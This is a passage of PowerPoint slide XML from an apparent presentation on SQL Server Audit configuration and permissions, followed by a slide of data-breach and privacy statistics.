        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90356100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0" y="5473457"/>
            <a:ext cx="12192000" cy="113054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20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="263524" y="5050968"/>
            <a:ext cx="11660789" cy="131590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182880" tIns="91440" rIns="182880" bIns="9144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R="0" lvl="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Currently, auditing can’t be done at the column level.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Permissions required:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ALTER ANY SERVER AUDIT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>CONTROL SERVER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="442072" y="3570515"/>
            <a:ext cx="11299077" cy="1564460"/>
            <a:chOff x="442072" y="9559137"/>
            <a:chExt cx="11299077" cy="1949269"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="599328" y="9559137"/>
              <a:ext cx="11141821" cy="194926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12" name="Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="442072" y="9559137"/>
              <a:ext cx="250078" cy="19492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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="442072" y="1843313"/>
            <a:ext cx="11299077" cy="609601"/>
            <a:chOff x="442072" y="9559137"/>
            <a:chExt cx="11299077" cy="1949269"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="599328" y="9559137"/>
              <a:ext cx="11141821" cy="194926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7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="442072" y="9559137"/>
              <a:ext cx="250078" cy="19492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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SQL Server Audit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274638" y="1420813"/>
            <a:ext cx="11072812" cy="3560762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The SQL Server Audit object is the parent component of a SQL Server audit and can contain:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server Audit Specifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Database Audit Specifications  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>It resides in the master database and is used to define the storage location for audit information, file roll over policy, the queue delay, and how SQL Server should react in case auditing isn’t possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The following configurations are required for SQL Server Audit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The SQL Server Audit name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The action to take in case of log failure:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="724765" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Continue and ignore the log issue </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="724765" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Shut down the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="724765" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fail the operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The audit destination</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9780370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F65C-0A12-4BB2-8B5A-6BC4F9109B4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data privacy today</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99A6E7C0-D984-4A96-89AB-C2E858066000}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1375395"/>
            <a:ext cx="5565617" cy="646111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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3528" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>5,286,896</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1567" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>data records breached</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1961" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1961" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>each day</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3528" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64076AF2-9652-49DD-91C0-C999914BC745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189038" y="2252710"/>
            <a:ext cx="3341158" cy="953843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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3528" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>40%</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1567" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>increase in data breaches from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1961" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2015 to 2016</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1765" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C4A430-360C-4528-B62F-32187F62CCA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5619108" y="1697476"/>
            <a:ext cx="6282380" cy="3980031"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7364401E-AA2E-4C30-9158-988ECE439EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371196" y="3437757"/>
            <a:ext cx="5052583" cy="1199901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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3528" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>91%</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1765" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1567" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>of adults agree that consumers have </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1961" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>lost control</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1567" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>of how personal information is collected and used by companies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C168980-D479-48D2-8724-88ED90EF6BCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189038" y="4868863"/>
            <a:ext cx="3958649" cy="953843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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3528" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>64%</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1567" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>of Americans have personally experienced a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1961" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
